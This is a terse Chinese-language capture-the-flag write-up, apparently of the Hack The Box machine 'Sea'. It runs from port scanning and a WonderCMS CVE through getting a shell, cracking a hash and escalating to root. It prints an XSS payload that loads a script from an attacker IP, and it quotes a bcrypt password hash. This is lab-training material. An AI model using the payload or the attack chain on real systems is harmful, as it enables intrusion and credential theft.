Web渗透

端口扫描

使用nmap进行端口探测

发现存在22和80端口开放。

访问80端口，然后使用F12查看源代码。

接着使用工具爆破目录
发现存在一些目录。
访问README.MD，发现是WonderCMS

使用浏览器搜索，发现存在CVE漏洞。

访问contact.PHP.

测试功能点。

发现存在SSRF漏洞。

接着访问index.php?目录

http://sea.htb/index.php?page=loginURL"></form><script src="http://10.10.16.3:8000/xss.js"></script><form action="

使用exp.py脚本尝试，发现未能攻击成功。

查看JS文件。

修改之后，重新尝试，成功获取shell。

然后进行内网信息收集。

查看/etc/passwd

查看数据库文件。

查看目录。

测试localhost

查看数据库文件，获取password。

"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
使用hashcat解密，获取密码。

接着使用netexec验证ssh吗密码。

使用SU进行切换。

接着搭建代理。

搭建客户端。

访问web站点。

发现可以进行文件读取。

然后读/etc/password

测试发现存在SQL注入

确定分组权限。

然后添加用户到管理员组，获取root权限。